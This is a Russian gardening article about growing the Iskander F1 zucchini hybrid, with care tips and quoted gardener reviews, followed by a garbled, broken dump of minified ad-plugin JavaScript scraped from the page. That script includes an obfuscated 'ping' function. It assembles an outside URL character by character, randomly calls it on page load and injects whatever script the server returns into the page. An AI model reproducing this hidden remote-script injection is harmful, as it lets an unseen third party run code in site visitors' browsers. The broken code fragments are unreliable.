  2. Загущенные посадки. Если сажать слишком часто кабачки, то у них в период роста начинается конкуренция за питание и влагу, что приводит к полному истощению культуры и отсутствию завязи.
  3. Болезни и вредители способны нанести урон урожаю. Если пренебрегать обработкой семян, земли и растений это приводит к снижению иммунитета и как следствие — отсутствию урожая.

Отзывы садоводов

Кабачок, в отличие от огурца, растение не прихотливое, хотя они и из одного семейства. Возможно, потому, что кабачок более мощный овощ. У огородников он пользуется заслуженной любовью. Урожай щедрый, калорийность низкая, а уж блюд напридумывано и не счесть.

Так получилось, что весной 2016 года семена к уже имеющимся докупала жена. Так и оказался у нас пакетик с кабачками «Искандер» F1. На фото, как всегда, «богатыри». А как же?! Реклама делает свое дело.

Каждый огородник желает получить полноценный результат при минимальных затратах. Вариант получить много вкусных и полезных кабачков — посадить ранний гибрид Искандер F1.

Кабачок Искандер: голландец в чести у многих фермеров

Кабачок — одна из самых популярных культур в нашей стране. Ведь кабачок — очень полезный, низкокалорийный овощ. На сегодняшний день существует множество разнообразных сортов кабачка, и начинающему огороднику сложно определиться с выбором подходящих семян. Каждый желает найти урожайный неприхотливый сорт с минимальным количеством семян в мякоти. К таким относится кабачок Искандер — высокопродуктивный сорт с прекрасными вкусовыми характеристиками.

Описание сорта

Кабачок сорта Искандер — сравнительно новый гибрид голландской селекции. Впервые этот сорт начали выращивать в Краснодарском крае. Сейчас его возделывают также на территории Молдовы и Украины. Он способен плодоносить даже при низких температурах, поэтому урожай можно собирать вплоть до поздней осени.

Внешний вид растения

На первый взгляд, кабачок сорта Искандер ничем не отличается от других сортов: продолговатый овощ нежно-зелёного цвета, украшенный сетью светлых прожилок и крапинок. Кожура у плодов тоненькая и нежная, с лёгкостью снимается ножом. На поверхности имеется малозаметный восковой налёт.

Кабачок Искандер имеет мощный куст

Длина овоща не превышает 18–20 см. Товарная масса кабачка Искандер составляет 500–650 г.

Растение мощное, пряморослое, но при этом компактное. Умеренно большие листья со средней рассечённостью и хорошо выраженной пятнистостью имеют окраску от светлой до тёмно-зелёной.

Отличительные черты кабачка Искандер

Важнейшее достоинство этого сорта — большая урожайность. Немудрено, что его возделывают не только на садовых участках, но и в промышленных условиях. Бывалые овощеводы отмечают, что с каждого гектара можно снять порядка 150 тонн зрелых кабачков сорта Искандер! На дачных участках обычно собирают 15–17 кг плодов с каждого растения.

Этот сорт не подвержен перерастанию и потере вкусовых характеристик.

Кабачок Искандер имеет тоненькую кожуру

Следующая отличительная черта сорта Искандер — раннеспелость. Снятие сформировавшихся овощей происходит уже через 30–45 дней после высадки семян. Для того чтобы получить продукцию раньше, кабачки выращивают под плёночными укрытиями.

Наконец, кабачок Искандер отличается стойкостью к антракнозу и мучнистой росе. Не менее существенной в условиях нашей страны является способность этого сорта формировать плоды даже в условиях короткого и недостаточно тёплого лета.

Это интересно! Кабачки по питательным показателям приближены к таким культурам, как огурцы, салаты и латук.

Особенности выращивания кабачка Искандер

Вырастить кабачок Искандер довольно просто, нужно лишь соблюдать некоторые правила.

Выбор места

В первую очередь, необходимо обратить особое внимание на качество грунта. Земля должна быть достаточно лёгкой, с нейтральной кислотностью. Кислый грунт необходимо известковать доломитовой мукой и внесением древесной золы. Грунтовые воды не должны располагаться вблизи поверхности земли. Еще одним немаловажным условием является тщательное прогревание грунта в течение всего периода роста и развития растения.

При несоблюдении этих элементарных условий растение будет плохо формироваться, и урожай не будет полноценным.

Это надо знать! Не рекомендуется высаживать кабачки на участок, где в прошлом сезоне росли тыквенные культуры. Лучшим местом для высадки считается земля, на которой выращивались бобовые, крестоцветные или паслёновые.

Подготовка семян

Кабачок сорта Искандер разрешается выращивать как рассадным методом, так и прямой заделкой семян в землю. В любом случае семена желательно предварительно подготовить — это вызовет появление дружных всходов более здоровых растений.

Подготовить семяна сорта Искандер довольно просто

Предпосадочная подготовка семян состоит из нескольких шагов:

  1. Выборка самых полновесных и неповреждённых семян.
  2. Вымачивание рассортированного материала в течение 12–24 часов в любом стимуляторе роста.
  3. После замачивания семена необходимо обернуть в увлажнённую ткань и убрать в умеренно тёплое место (+22…+24°C) на два дня.

Обратите внимание! При выращивании кабачка гибридного сорта Искандер получить собственный качественный посадочный материал не удастся, это гибрид, поэтому необходимо приобретать семена проверенных и хорошо зарекомендовавших себя компаний.

Рассадный способ

Для получения более раннего урожая необходимо за месяц до основных огородных работ начать подготовку рассады.:

  1. Семена раскладывают в стаканчики или особые кассеты. Перед этим грунт желательно удобрить добавлением торфа, навоза, перегноя или же готовым специальным удобрением.
  2. В каждый стаканчик опускают одно-два семечка на глубину 3–5 см.
  3. Увлажнять почву в стаканчиках необходимо раз в 7–10 дней.
  4. Чтобы корни растений не повредились, на постоянное место их высаживают вместе с земляным комом.

Для получения раннего урожая используется рассадный материал

Безрассадный способ

Лунки должны располагаться на дистанции 60 см друг от друга, чтобы каждому растению хватало питания и влаги. В каждую лунку нужно заложить удобрения и высевать по 3–4 семечка. Семена всходят при прогретом до +12…+15°C воздухе в течение недели.

Следует учитывать, что молодые растеньица не способны выдержать возвратных заморозков. В связи с этим высаживать кабачки следует не раньше третьей декады мая, а для продления времени получения свежих овощей посевы проводят в несколько этапов с промежутком в неделю.

Правила ухода за растением

Как мы видим, высаживать кабачки сорта Искандер совсем нетрудно. Чтобы растения радовали своих обладателей отличными урожаями, следует позаботиться о несложном, но необходимом уходе.

  1. Полив. Для хорошего развития кустам нужно примерно 20 л воды на 1 м 2 посадок.
  2. Внесение удобрений. Для лучшего роста и развития растения желательно дважды подкормить: в период цветения и формирования плодов. Во время созревания овощей кусты хорошо отзываются на 50 г. калийной соли, растворённой в литре воды. Нельзя забывать, что кабачок плохо реагирует на удобрения, в составе которых содержится хлор.
  3. Опрыскивания. Необходимо для привлечения большего числа насекомых-опылителей. Для этого необходимо опрыскивать растения подслащённой водой.

Видео: опыт выращивания кабачков Искандер

Сбор урожая

Первые плоды можно снимать уже через 30–45 дней после появления первых всходов. Для отправки овощей на хранение следует дать им хорошенько вызреть. Вызревший плод с лёгкостью отличается по типичному глухому звучанию в момент постукивания. Кожура становится более твёрдой, её трудно оцарапать.

Зрелый кабачок с лёгкостью пролежит в подвале на протяжении пяти месяцев.

Если же урожай уродился на славу, и употребить кабачки за такой период не удастся, то следует отправить их на переработку, иначе они потеряют свои вкусовые качества.

С одного куста можно собрать до 17 кг кабачков за сезон

Отзывы

Кабачки выращиваю уже четыре года. Перепробовала большое количество и сортов и гибридов этого замечательного овоща. В нашей семье кабачки занимают одно из почётных мест в летнем рационе. Поэтому для меня было просто необходимо не только подобрать сорта отвечающие всем вкусовым предпочтениям членов моей семьи, но и лёгкие в выращивании, не особо требовательные к агротехнике, устойчивые к болезням и сухому климату.Гибрид кабачка «Искандер», оказался лучшим из всех мной перепробованных.

…Какие же замечательные кабачковые оладушки мы кушали всё прошлое лето и рагу и просто обжаренные ломтики кабачка со сметанкой. Я не говорю уже о заготовках на зиму.

…Хочу ещё заметить, что «Искандер» довольно рано начинает завязывать плоды, быстро созревать, куст не ползучий — это кустовой кабачок, а значит занимает мало места на огороде, при обильной урожайности.

Salamandra M

http://otzovik.com/review_1837009.html

Сажала разные, теперь только Искандер Ф1 — 5+Нравится всем — ранний, плодов очень много (висят как бананы в грозди), долгий период плодоношения, вкусный, шкурка мягкая даже у переростков.

Калининградка

Добрый день. Садовод я начинающий, но есть хороший первый опыт. Хочу посоветовать сорт кабачка Искандер, плоды на 2 недели раньше. Листьев очень мало, хорошая урожайность.

valentina63

https://www.forumhouse.ru/threads/6601/page-6

В 2015 году я посадил грядку кабачков, Голандскими семенами сорта Искандер! Это ультроранний гибрит кабачка предназначенного для получения массового производства в открытых грунтах. Плодоношение данного сорта длится более двух месяцев! Плоды кабачков цилиндрической формы и длиной 18–20 сантиметров, светло-зеленого цвета, а мякоть просто белоснежная! Данный сорт отлично подходит для употребления в пищу (в жаренном виде очень вкусные), а также можно делать закрутки, лично я мариновал, получилось просто супер! Хороший сорт, в этом году обязательно посажу ещё немного), чего и Вам советую, не пожалеете!

Matadork1

http://otzovik.com/review_4419671.html

А я сажу уже несколько лет Искандер. Очень нравится. Кустовой, урожайный. 3-х кустов хватает для всех: семье, друзьям, зверям. Особо не ухаживаю, только полив регулярный.

Крымка

http://www.sadiba.com.ua/forum/showthread.php?t=1654

Давно сажая «Искандер» заметил, что в августе он становится менее продуктивным. Это я объясняю тем, что не произвожу подкормки удобрениями, т. к. моя внучка хочет кормить своего сына (моего правнука), только чистыми продуктами. Моя жена режет кабачки кубиками и замораживает.

В этом году 23.06.12г. подсадил ещё три семечка «Искандера». Сажал, как и всё в кипяток, т. е. заготовил лунки, заправил золой и удобрениями, хорошо пролил, подождал, пока вода впитается, полил кипятком и в горячую землю сажал сухие семена. Так же я сажаю и огурцы. Второго июля все три семечка взошли.

Lukaed

https://www.forumhouse.ru/threads/6601/page-21

Кабачок Искандер хорошо зарекомендовал себя на отечественном рынке благодаря довольно раннему созреванию и формированию компактного куста, что позволяет получать превосходный урожай на небольшой площади. Кабачки не подвержены перерастанию, а их нежные на вкус плоды подходят для употребления как в свежем виде, так и для термической обработки и консервации.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};